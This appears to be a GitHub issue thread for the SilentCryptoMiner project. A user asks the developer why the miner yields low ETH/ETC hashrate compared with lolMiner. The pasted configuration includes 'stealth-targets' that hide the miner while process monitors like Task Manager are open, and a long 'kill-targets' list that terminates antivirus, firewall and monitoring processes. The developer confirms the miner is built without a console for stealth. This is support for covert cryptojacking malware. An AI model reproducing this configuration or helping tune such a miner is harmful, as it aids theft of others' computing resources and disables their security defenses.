### ISSUE TITLE
low hashrate

### ISSUE THREAD

**Issue by ahmedjafari** [UnamSanctam/SilentCryptoMiner#706]
low hashrate  i mined by my own PC's  GPUS AND CPUS
when i use the silent miner on XMR is good Hashrate as normal XMRRIG
but when i use it for ETH or ETC   the hash rate is not normal something woring 
am geting low hash rate with silent miner on GPUS  not as other miners  what is the problem about ?

**Comment by ahmedjafari** [comment]
the Pc's used over night  i did watch the miners whole week 
the GPU is used only for mining

**Comment by ahmedjafari** [comment]
@UnamSanctam

**Comment by UnamSanctam** [comment]
Post your hashrate, GPU and settings.

**Comment by ahmedjafari** [comment]
left side is silant miner  and right side is lolminer
https://ibb.co/jy8wYs0

    "algo": "etchash",
    "max-gpu": 100,
    "idle-wait": 1,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe"
}

**Comment by ahmedjafari** [comment]
this is happin only with eth or etc

**Comment by ahmedjafari** [comment]
lol miner is stornger  how can i get same hashrate as the lol miner from same pcs

**Comment by UnamSanctam** [comment]
Post an example, that doesn't tell me much. What GPU and what hashrate does one of the computers have?

**Comment by ahmedjafari** [comment]
u mean example of miner  file or screenshots of panel ?
because in the Panel shows i have always 32mh  
but in the pool is very weak  maybe 50% hashrate  only i receive or someting

**Comment by ahmedjafari** [comment]
is there is anyway to watch logs or see the hashrate from the pc as test  likle am seeing the lolminer  and what kind of miner is in silent miner

**Comment by UnamSanctam** [comment]
You see it in the web panel (miner is compiled without a console for stealth), the hashrate in the web panel taken from the same place (function) as the logs, ethminer is the miner used.
